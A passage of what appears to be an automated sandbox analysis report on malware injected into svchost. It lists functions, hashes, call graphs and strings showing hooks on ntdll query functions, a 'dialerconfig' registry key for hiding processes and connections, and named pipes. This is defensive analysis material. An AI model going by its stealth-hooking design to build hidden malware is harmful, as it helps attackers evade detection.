179537a2d3a-179537a2d3d 431->440 432->431 438 179537a2cdd-179537a2cea 432->438 435 179537a2dc7-179537a2dd4 433->435 436 179537a2df5-179537a2df8 433->436 434->433 435->436 442 179537a2dd6-179537a2de3 435->442 443 179537a2e05-179537a2e12 lstrlenW 436->443 444 179537a2dfa-179537a2e03 call 179537a1bbc 436->444 445 179537a2ced-179537a2cf3 438->445 439->440 446 179537a2d1b-179537a2d28 439->446 447 179537a2d4b-179537a2d58 lstrlenW 440->447 448 179537a2d3f-179537a2d49 call 179537a1bbc 440->448 450 179537a2de6-179537a2dec 442->450 456 179537a2e14-179537a2e1e 443->456 457 179537a2e35-179537a2e3f call 179537a3844 443->457 444->443 461 179537a2e4a-179537a2e55 444->461 454 179537a2d93-179537a2d98 445->454 455 179537a2cf9-179537a2cfe 445->455 458 179537a2d2b-179537a2d31 446->458 451 179537a2d7b-179537a2d8d call 179537a3844 447->451 452 179537a2d5a-179537a2d64 447->452 448->447 448->454 450->461 462 179537a2dee-179537a2df3 450->462 451->454 466 179537a2e42-179537a2e44 451->466 452->451 463 179537a2d66-179537a2d79 call 179537a152c 452->463 454->466 455->431 455->445 456->457 467 179537a2e20-179537a2e33 call 179537a152c 456->467 457->466 458->454 468 179537a2d33-179537a2d38 458->468 470 179537a2e57-179537a2e5b 461->470 471 179537a2ecc-179537a2ed0 461->471 462->436 462->450 463->451 463->454 466->428 466->461 467->457 467->461 468->440 468->458 476 179537a2e63-179537a2e7d call 179537a85c0 470->476 477 179537a2e5d-179537a2e61 470->477 471->428 480 179537a2e80-179537a2e83 476->480 477->476 477->480 483 179537a2e85-179537a2ea3 call 179537a85c0 480->483 484 179537a2ea6-179537a2ea9 480->484 483->484 484->471 486 179537a2eab-179537a2ec9 call 179537a85c0 484->486 486->471
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: a68df60460c540e5a9242f56c6b8bfc5263ec75fa9e1868138209c41af1d70d8
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 0BB1BF72A28AA092EB6A8F25C4447E963B5F74AB8CF445017EE4D53B95EF35CCC8C740
                                                        Function 00000179537A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 58b78ca673e8f1c025eb56569f683145776f8da21aff7224e17a305cb7f8da99
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: FC317072619B908AEB619F60E8503EE7371F785748F44402ADB8D57B94EF38C54CC714
                                                        Function 00000179537AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: fac0d66ec64c3925cbc38e830e94581c1ed51f6a25e90594bb5b961479521937
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: C8315F32618B9096EB61CF25E8503DE73B4F78A758F540126EA9D53B94EF38C659CB00
                                                        Function 00000179537A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 206c1a27e464331c4bd0b9a092aeafa2340499ab111ab09f1a96645441c587cd
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: A371F136B18A2485FB11AF66E8A0ADD3374F786B8CF401122DE4E57B69EF38C548C744
                                                        Function 00000179537A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 6227fafc9fbf8ae47cd58b7f6cf4b5d99e6e7defb89df161162dad1074e44a04
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 83517C72A18B9886EB51CF66E45839A77B1F38AF89F444126DE8D47718EF3CC049CB00
                                                        Function 00000179537A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: ba4581b48e2ff6b855cacc301ebdcd167c7a3886c66976a807292e1e89fccdae
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: AF315074E299AAA0FE17EF65E8616D46371B70634CFC05023D84D13766AE7C868EC750
                                                        Function 0000017953776910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 17953776910-17953776916 242 17953776918-1795377691b 241->242 243 17953776951-1795377695b 241->243 244 1795377691d-17953776920 242->244 245 17953776945-17953776984 call 17953776fc0 242->245 246 17953776a78-17953776a8d 243->246 247 17953776938 __scrt_dllmain_crt_thread_attach 244->247 248 17953776922-17953776925 244->248 264 1795377698a-1795377699f call 17953776e54 245->264 265 17953776a52 245->265 249 17953776a8f 246->249 250 17953776a9c-17953776ab6 call 17953776e54 246->250 256 1795377693d-17953776944 247->256 252 17953776927-17953776930 248->252 253 17953776931-17953776936 call 17953776f04 248->253 254 17953776a91-17953776a9b 249->254 262 17953776aef-17953776b20 call 17953777190 250->262 263 17953776ab8-17953776aed call 17953776f7c call 17953776e1c call 17953777318 call 17953777130 call 17953777154 call 17953776fac 250->263 253->256 275 17953776b22-17953776b28 262->275 276 17953776b31-17953776b37 262->276 263->254 273 17953776a6a-17953776a77 call 17953777190 264->273 274 179537769a5-179537769b6 call 17953776ec4 264->274 268 17953776a54-17953776a69 265->268 273->246 291 179537769b8-179537769dc call 179537772dc call 17953776e0c call 17953776e38 call 1795377ac0c 274->291 292 17953776a07-17953776a11 call 17953777130 274->292 275->276 279 17953776b2a-17953776b2c 275->279 280 17953776b7e-17953776b94 call 1795377268c 276->280 281 17953776b39-17953776b43 276->281 287 17953776c1f-17953776c2c 279->287 300 17953776bcc-17953776bce 280->300 301 17953776b96-17953776b98 280->301 288 17953776b4f-17953776b5d call 17953785780 281->288 289 17953776b45-17953776b4d 281->289 294 17953776b63-17953776b78 call 17953776910 288->294 310 17953776c15-17953776c1d 288->310 289->294 291->292 344 179537769de-179537769e5 __scrt_dllmain_after_initialize_c 291->344 292->265 314 17953776a13-17953776a1f call 17953777180 292->314 294->280 294->310 308 17953776bd0-17953776bd3 300->308 309 17953776bd5-17953776bea call 17953776910 300->309 301->300 307 17953776b9a-17953776bbc call 1795377268c call 17953776a78 301->307 307->300 338 17953776bbe-17953776bc6 call 17953785780 307->338 308->309 308->310 309->310 323 17953776bec-17953776bf6 309->323 310->287 331 17953776a45-17953776a50 314->331 332 17953776a21-17953776a2b call 17953777098 314->332 328 17953776bf8-17953776bff 323->328 329 17953776c01-17953776c11 call 17953785780 323->329 328->310 329->310 331->268 332->331 343 17953776a2d-17953776a3b 332->343 338->300 343->331 344->292 345 179537769e7-17953776a04 call 1795377abc8 344->345 345->292
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e41be534229163122c3179cc1025da5169d2b8c0ede0d6324f4ee0300e7142a4
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: BB81F772F1C26186F657AB2594413D967F0E78778CF548527AA0C8379FDB38C84D8B08
                                                        Function 00000179537ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000179537ACE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEBC
                                                        • SetLastError.KERNEL32 ref: 00000179537ACED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000179537AECCC,?,?,?,?,00000179537ABF9F,?,?,?,?,?,00000179537A7AB0), ref: 00000179537ACF2C
                                                          • Part of subcall function 00000179537AD6CC: HeapAlloc.KERNEL32 ref: 00000179537AD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF54
                                                          • Part of subcall function 00000179537AD744: HeapFree.KERNEL32 ref: 00000179537AD75A
                                                          • Part of subcall function 00000179537AD744: GetLastError.KERNEL32 ref: 00000179537AD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF76
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 77b7efc725698ca54b94f8a3bbd63b6bf6571e27a76a959dc314b8d8e9e59c42
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: FA41D370F2C27951FA2BA73149553E923B15B477BCF1C4737A83E867DADE28C4494200
                                                        Function 00000179537A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: bf197e0ffd1960bdac6007c57ce7df944ff2740a99a669adc726ba4408a275dc
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 06214F32A1876482FB118B25F45479973B1F78ABA8F504216EB9D03BA8DF3CC14DCB04
                                                        Function 0000017953779944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 17953779944-179537799ac call 1795377a814 502 17953779e13-17953779e1b call 1795377bb48 499->502 503 179537799b2-179537799b5 499->503 503->502 504 179537799bb-179537799c1 503->504 506 17953779a90-17953779aa2 504->506 507 179537799c7-179537799cb 504->507 509 17953779aa8-17953779aac 506->509 510 17953779d63-17953779d67 506->510 507->506 511 179537799d1-179537799dc 507->511 509->510 512 17953779ab2-17953779abd 509->512 514 17953779da0-17953779daa call 17953778a34 510->514 515 17953779d69-17953779d70 510->515 511->506 513 179537799e2-179537799e7 511->513 512->510 516 17953779ac3-17953779aca 512->516 513->506 517 179537799ed-179537799f7 call 17953778a34 513->517 514->502 528 17953779dac-17953779dcb call 17953776d40 514->528 515->502 518 17953779d76-17953779d9b call 17953779e1c 515->518 520 17953779ad0-17953779b07 call 17953778e10 516->520 521 17953779c94-17953779ca0 516->521 517->528 532 179537799fd-17953779a28 call 17953778a34 * 2 call 17953779124 517->532 518->514 520->521 537 17953779b0d-17953779b15 520->537 521->514 525 17953779ca6-17953779caa 521->525 529 17953779cac-17953779cb8 call 179537790e4 525->529 530 17953779cba-17953779cc2 525->530 529->530 543 17953779cdb-17953779ce3 529->543 530->514 536 17953779cc8-17953779cd5 call 17953778cb4 530->536 568 17953779a2a-17953779a2e 532->568 569 17953779a48-17953779a52 call 17953778a34 532->569 536->514 536->543 541 17953779b19-17953779b4b 537->541 545 17953779c87-17953779c8e 541->545 546 17953779b51-17953779b5c 541->546 548 17953779ce9-17953779ced 543->548 549 17953779df6-17953779e12 call 17953778a34 * 2 call 1795377baa8 543->549 545->521 545->541 546->545 550 17953779b62-17953779b7b 546->550 552 17953779d00 548->552 553 17953779cef-17953779cfe call 179537790e4 548->553 549->502 554 17953779c74-17953779c79 550->554 555 17953779b81-17953779bc6 call 179537790f8 * 2 550->555 563 17953779d03-17953779d0d call 1795377a8ac 552->563 553->563 559 17953779c84 554->559 580 17953779bc8-17953779bee call 179537790f8 call 1795377a038 555->580 581 17953779c04-17953779c0a 555->581 559->545 563->514 577 17953779d13-17953779d61 call 17953778d44 call 17953778f50 563->577 568->569 574 17953779a30-17953779a3b 568->574 569->506 584 17953779a54-17953779a74 call 17953778a34 * 2 call 1795377a8ac 569->584 574->569 576 17953779a3d-17953779a42 574->576 576->502 576->569 577->514 599 17953779bf0-17953779c02 580->599 600 17953779c15-17953779c72 call 17953779870 580->600 588 17953779c0c-17953779c10 581->588 589 17953779c7b 581->589 605 17953779a8b 584->605 606 17953779a76-17953779a80 call 1795377a99c 584->606 588->555 593 17953779c80 589->593 593->559 599->580 599->581 600->593 605->506 609 17953779df0-17953779df5 call 1795377baa8 606->609 610 17953779a86-17953779def call 179537786ac call 1795377a3f4 call 179537788a0 606->610 609->549 610->609
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: c1e37324251eb8afeee7f02a8d197e06ab5e66d9bdec95cbde6af93207a2d4f1
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 68E18972A0ABA08AEB629B65D4813DD77F0F747B9CF100116EE8D57B9ACB34D499C700
                                                        Function 00000179537AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 620 179537aa544-179537aa5ac call 179537ab414 623 179537aaa13-179537aaa1b call 179537ac748 620->623 624 179537aa5b2-179537aa5b5 620->624 624->623 625 179537aa5bb-179537aa5c1 624->625 627 179537aa5c7-179537aa5cb 625->627 628 179537aa690-179537aa6a2 625->628 627->628 632 179537aa5d1-179537aa5dc 627->632 630 179537aa963-179537aa967 628->630 631 179537aa6a8-179537aa6ac 628->631 635 179537aa969-179537aa970 630->635 636 179537aa9a0-179537aa9aa call 179537a9634 630->636 631->630 633 179537aa6b2-179537aa6bd 631->633 632->628 634 179537aa5e2-179537aa5e7 632->634 633->630 638 179537aa6c3-179537aa6ca 633->638 634->628 639 179537aa5ed-179537aa5f7 call 179537a9634 634->639 635->623 640 179537aa976-179537aa99b call 179537aaa1c 635->640 636->623 646 179537aa9ac-179537aa9cb call 179537a7940 636->646 643 179537aa894-179537aa8a0 638->643 644 179537aa6d0-179537aa707 call 179537a9a10 638->644 639->646 654 179537aa5fd-179537aa628 call 179537a9634 * 2 call 179537a9d24 639->654 640->636 643->636 647 179537aa8a6-179537aa8aa 643->647 644->643 658 179537aa70d-179537aa715 644->658 651 179537aa8ac-179537aa8b8 call 179537a9ce4 647->651 652 179537aa8ba-179537aa8c2 647->652 651->652 665 179537aa8db-179537aa8e3 651->665 652->636 657 179537aa8c8-179537aa8d5 call 179537a98b4 652->657 688 179537aa648-179537aa652 call 179537a9634 654->688 689 179537aa62a-179537aa62e 654->689 657->636 657->665 662 179537aa719-179537aa74b 658->662 667 179537aa751-179537aa75c 662->667 668 179537aa887-179537aa88e 662->668 669 179537aa9f6-179537aaa12 call 179537a9634 * 2 call 179537ac6a8 665->669 670 179537aa8e9-179537aa8ed 665->670 667->668 671 179537aa762-179537aa77b 667->671 668->643 668->662 669->623 673 179537aa8ef-179537aa8fe call 179537a9ce4 670->673 674 179537aa900 670->674 675 179537aa874-179537aa879 671->675 676 179537aa781-179537aa7c6 call 179537a9cf8 * 2 671->676 684 179537aa903-179537aa90d call 179537ab4ac 673->684 674->684 680 179537aa884 675->680 701 179537aa804-179537aa80a 676->701 702 179537aa7c8-179537aa7ee call 179537a9cf8 call 179537aac38 676->702 680->668 684->636 699 179537aa913-179537aa961 call 179537a9944 call 179537a9b50 684->699 688->628 705 179537aa654-179537aa674 call 179537a9634 * 2 call 179537ab4ac 688->705 689->688 693 179537aa630-179537aa63b 689->693 693->688 698 179537aa63d-179537aa642 693->698 698->623 698->688 699->636 709 179537aa87b 701->709 710 179537aa80c-179537aa810 701->710 720 179537aa815-179537aa872 call 179537aa470 702->720 721 179537aa7f0-179537aa802 702->721 726 179537aa676-179537aa680 call 179537ab59c 705->726 727 179537aa68b 705->727 711 179537aa880 709->711 710->676 711->680 720->711 721->701 721->702 730 179537aa686-179537aa9ef call 179537a92ac call 179537aaff4 call 179537a94a0 726->730 731 179537aa9f0-179537aa9f5 call 179537ac6a8 726->731 727->628 730->731 731->669
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 48bad793c3cf8a064d8991e65e6d6caa703c72e63802b69e7c4d4fa44d5e9957
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: DCE18E72A28BA48AEBA2DF65D4803DD77B0F746B9CF100116EE8D57B95CB34C599CB00
                                                        Function 00000179537AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 6d28e7484422e4a57a06ac6147cde09464f9819a0b3aea55b6358727e73b2730
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 3C41B532B2DA2091FB17DB66AC147D523B1BB46BA8F1941279D2E87784EF38C44DC324
                                                        Function 00000179537A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 4d0dabdc3bb95f01b52548fecc3f9169e00d7fa873fa5b6aedad960dda8fc516
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 8E416C73618B94C6E761CF21E45479A77B1F389B9CF44812AEB8947B58EF38C489CB00
                                                        Function 00000179537AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: b0a3c49dc6ef7a53409216961fbfbc30d008a76d59ac91324fc92d9a86fd0cd9
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C311C870F2C26841FA6B673699613EA63715B473FCF144337A83D477EADE28C54A8200
                                                        Function 00000179537A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 03549ce5a8bfb50d1d2883e7ce9a3f420bf030cad668bfca8cca14f47c08375e
